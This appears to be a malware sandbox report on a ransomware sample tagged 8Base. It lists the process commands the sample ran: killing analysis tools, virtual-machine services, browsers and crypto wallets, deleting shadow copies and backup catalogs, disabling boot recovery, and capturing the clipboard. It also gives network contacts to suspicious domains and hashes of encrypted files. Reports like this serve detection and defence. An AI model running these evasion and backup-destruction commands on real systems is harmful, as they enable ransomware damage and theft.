C:\Windows\explorer.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM taskmgr.exe

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq vboxservice.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM vboxservice.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\explorer.exe

C:\Windows\explorer.exe

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq df5serv.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM df5serv.exe

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq processhacker.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM processhacker.exe

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq vboxtray.exe"

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM vboxtray.exe

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq vmtoolsd.exe"

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM vmtoolsd.exe

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq vmwaretray.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM vmwaretray.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq ida64.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM ida64.exe

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq ollydbg.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM ollydbg.exe

C:\Windows\explorer.exe

C:\Windows\explorer.exe

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq pestudio.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM pestudio.exe

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq vmwareuser.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM vmwareuser.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq vgauthservice.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM vgauthservice.exe

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq vmacthlp.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM vmacthlp.exe

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq x96dbg.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM x96dbg.exe

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq vmsrvc.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM vmsrvc.exe

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq x32dbg.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM x32dbg.exe

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq vmusrvc.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM vmusrvc.exe

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq prl_cc.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM prl_cc.exe

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq prl_tools.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM prl_tools.exe

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq xenservice.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM xenservice.exe

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq qemu-ga.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM qemu-ga.exe

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq joeboxcontrol.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM joeboxcontrol.exe

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq ksdumperclient.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM ksdumperclient.exe

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq ksdumper.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM ksdumper.exe

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq joeboxserver.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM joeboxserver.exe

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq Wireshark.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM Wireshark.exe

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq idaq.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM idaq.exe

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq idaq64.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM idaq64.exe

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq ida64.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM ida64.exe

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq OLLYDBG.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM OLLYDBG.exe

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq WinDbg.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM WinDbg.exe

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq Procmon.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM Procmon.exe

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq vmware.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM vmware.exe

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq vmware-tray.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM vmware-tray.exe

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq vmware-vmx.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM vmware-vmx.exe

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq vmware-authd.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM vmware-authd.exe

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq VirtualBox.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM VirtualBox.exe

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq VBoxSVC.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM VBoxSVC.exe

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq VBoxNetDHCP.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM VBoxNetDHCP.exe

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq VBoxNetNAT.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM VBoxNetNAT.exe

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq VBoxHeadless.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM VBoxHeadless.exe

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq qemu-system-x86_64.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM qemu-system-x86_64.exe

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq qemu-system-arm.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM qemu-system-arm.exe

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq python.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM python.exe

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq pythonw.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM pythonw.exe

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq python3.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM python3.exe

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq python3w.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM python3w.exe

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq Taskmgr.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM Taskmgr.exe

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq msconfig.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM msconfig.exe

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq regedit.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM regedit.exe

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq x64dbg.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM x64dbg.exe

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq x32dbg.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM x32dbg.exe

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq radare2.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM radare2.exe

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq r2.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM r2.exe

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq Ghidra.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM Ghidra.exe

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq ImmunityDebugger.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM ImmunityDebugger.exe

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq ImmunityDebugger.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM ImmunityDebugger.exe

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq Fiddler.exe"

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\Desktop\info.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}

C:\Windows\system32\taskkill.exe

taskkill /F /IM Fiddler.exe

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\SysWOW64\mshta.exe" "C:\users\public\desktop\info.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\SysWOW64\mshta.exe" "C:\info.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\SysWOW64\mshta.exe" "F:\info.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe"

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq tcpview.exe"

C:\Windows\system32\vssadmin.exe

vssadmin delete shadows /all /quiet

C:\Windows\system32\taskkill.exe

taskkill /F /IM tcpview.exe

C:\Windows\System32\Wbem\WMIC.exe

wmic shadowcopy delete

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq Sysmon.exe"

C:\Windows\system32\bcdedit.exe

bcdedit /set {default} bootstatuspolicy ignoreallfailures

C:\Windows\system32\bcdedit.exe

bcdedit /set {default} recoveryenabled no

C:\Windows\system32\taskkill.exe

taskkill /F /IM Sysmon.exe

C:\Windows\system32\wbadmin.exe

wbadmin delete catalog -quiet

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq ProcessHacker.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM ProcessHacker.exe

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq ApateDNS.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM ApateDNS.exe

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq Cuckoo.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM Cuckoo.exe

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq CFF Explorer.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM "CFF Explorer.exe"

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq Wireshark.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM Wireshark.exe

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq Regshot.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM Regshot.exe

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq procexp.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM procexp.exe

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq procexp64.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM procexp64.exe

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq dumpcap.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM dumpcap.exe

C:\Windows\system32\curl.exe

curl -s ipinfo.io/country

C:\Windows\System32\WindowsPowerShell\v1.0\PowerShell.exe

PowerShell -Command Add-Type -AssemblyName "System.Windows.Forms;$clip=[Windows.Forms.Clipboard]::GetImage();if ($clip -ne $null) { $clip.Save('C:\Users\Admin\AppData\Local\Temp\2985226527') };"

C:\Windows\system32\curl.exe

curl -s ipinfo.io/country

C:\Windows\System32\Wbem\wmic.exe

wmic desktopmonitor get "screenheight, screenwidth"

C:\Windows\system32\cmd.exe

cmd /C net session

C:\Windows\system32\net.exe

net session

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 session

C:\Windows\system32\systeminfo.exe

systeminfo

C:\Windows\system32\curl.exe

curl -s ipinfo.io/country

C:\Windows\System32\Wbem\wmic.exe

wmic csproduct get uuid

C:\Windows\system32\taskkill.exe

taskkill /F /IM msedge.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM chrome.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM brave.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM firefox.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM Telegram.exe

C:\Windows\system32\cmd.exe

cmd /C "C:\Users\Admin\AppData\Local\Temp\My Phone.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM msedge.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM chrome.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM brave.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM firefox.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM bitcoin-qt.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM litecoin-qt.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM dash-qt.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM geth.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM electrum.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM exodus.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM atomic.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM monero-wallet-gui.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM monerod.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM coinomi.exe

C:\Windows\system32\curl.exe

curl -s ipinfo.io/country

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 146.78.124.51.in-addr.arpa udp
US 8.8.8.8:53 1.202.248.87.in-addr.arpa udp
US 8.8.8.8:53 73.31.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 45.19.74.20.in-addr.arpa udp
US 8.8.8.8:53 servblog25.xyz udp
DE 45.131.66.61:80 servblog25.xyz tcp
US 8.8.8.8:53 61.66.131.45.in-addr.arpa udp
US 8.8.8.8:53 208.194.73.20.in-addr.arpa udp
US 8.8.8.8:53 86.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 240.81.21.72.in-addr.arpa udp
US 8.8.8.8:53 serverxlogs21.xyz udp
DE 45.131.66.120:80 serverxlogs21.xyz tcp
US 8.8.8.8:53 netflixxonline.processing-updates.site udp
CA 172.105.107.189:443 netflixxonline.processing-updates.site tcp
US 8.8.8.8:53 120.66.131.45.in-addr.arpa udp
US 8.8.8.8:53 189.107.105.172.in-addr.arpa udp
US 8.8.8.8:53 ipinfo.io udp
US 34.117.59.81:80 ipinfo.io tcp
US 34.117.59.81:443 ipinfo.io tcp
US 8.8.8.8:53 81.59.117.34.in-addr.arpa udp
US 8.8.8.8:53 apps.identrust.com udp
US 2.18.121.68:80 apps.identrust.com tcp
US 8.8.8.8:53 68.121.18.2.in-addr.arpa udp
US 8.8.8.8:53 254.21.238.8.in-addr.arpa udp
DE 167.86.123.82:8080 167.86.123.82 tcp

Files


MD5 6fa4f10e853cf89b061c9268c8133576
SHA1 0466e9d8d09fc0abaf2e27da97dfa0237cb87dba
SHA256 dd43f704f19efe024b46f26d08390aa8604b9b6f57301524f7a4f4670cd09fff
SHA512 b4c7d82e7ffdfd701fffd1e47c1a14d3b51226983560f90dde709c040bffb2fabc164a158e9cf69a4a0604e8108937f56d691d61bc1442b2d3d7e62c1a78ef46

C:\Users\Admin\AppData\Local\Temp\B1D6\C\Windows\SysWOW64\WalletProxy.dll.id[49C07676-3483].[[email protected]].8base

MD5 4cf7bea86a26583101e449800788dc37
SHA1 7996eba7e26ef80d697b0508611eb0ba8894abfc
SHA256 af1b82395d73b965742d73e5de25cc2a27ca9a1aef1b6f36abdf2ee964a1b1c7
SHA512 86b1a06cebd1fea0a2293ab3369767177eb0d256a0d281ba82df63fcaf855a5f15e1b78e2094d474d668dd32bac2999e2e7352fc4bb1286dff97c972c7c49f62

C:\Users\Admin\AppData\Local\Temp\B1D6\C\Windows\SysWOW64\WalletBackgroundServiceProxy.dll.id[49C07676-3483].[[email protected]].8base

MD5 708eb29f4777a503c45825d329023a74
SHA1 95d17a423e5ca11fed0b3e2d4f063a1a0c6c94dc
SHA256 173ef8765682723f8a795e3dfc46ebb10f3d12486a7d756aa4d5237f505430d1
SHA512 6c34d3ded38767903385a9aed69462538e776479a1b150cbd7c64c59aad774508b2b47298cc397ba4bef0659f5ebde20e48b82f2e2913b07c30dd883d98ba14c

C:\Users\Admin\AppData\Local\Temp\B1D6\C\Windows\WinSxS\wow64_microsoft-windows-wallet-service.proxy_31bf3856ad364e35_10.0.19041.1_none_69993b7d6814452d\WalletProxy.dll

MD5 d09724c29a8f321f2f9c552de6ef6afa
SHA1 d6ce3d3a973695f4f770e7fb3fcb5e2f3df592a3
SHA256 23cc82878957683184fbd0e3098e9e6858978bf78d7812c6d7470ebdc79d1c5c
SHA512 cc8db1b0c4bbd94dfc8a669cd6accf6fa29dc1034ce03d9dae53d6ce117bb86b432bf040fb53230b612c6e9a325e58acc8ebb600f760a8d9d6a383ce751fd6ed

C:\Users\Admin\AppData\Local\Temp\B1D6\C\Windows\WinSxS\wow64_microsoft-windows-w..ice.backgroundproxy_31bf3856ad364e35_10.0.19041.1_none_046b779f2003c415\WalletBackgroundServiceProxy.dll

MD5 1097d1e58872f3cf58f78730a697ce4b
SHA1 96db4e4763a957b28dd80ec1e43eb27367869b86
SHA256 83ec0be293b19d00eca4ae51f16621753e1d2b11248786b25a1abaae6230bdef
SHA512 b933eac4eaabacc51069a72b24b649b980aea251b1b87270ff4ffea12de9368d5447cdbe748ac7faf2805548b896c8499f9eceeed2f5efd0c684f94360940351

C:\Users\Admin\AppData\Local\Temp\B1D6\C\Windows\WinSxS\wow64_microsoft-windows-wallet-winrt_31bf3856ad364e35_10.0.19041.746_none_b3a887dd4a9553e8\Windows.ApplicationModel.Wallet.dll

MD5 02557c141c9e153c2b7987b79a3a2dd7
SHA1 a054761382ee68608b6a3b62b68138dc205f576b
SHA256 207c587e769e2655669bd3ce1d28a00bcac08f023013735f026f65c0e3baa6f4
SHA512 a37e29c115bcb9956b1f8fd2022f2e3966c1fa2a0efa5c2ee2d14bc5c41bfddae0deea4d481a681d13ec58e9dec41e7565f8b4eb1c10f2c44c03e58bdd2792b3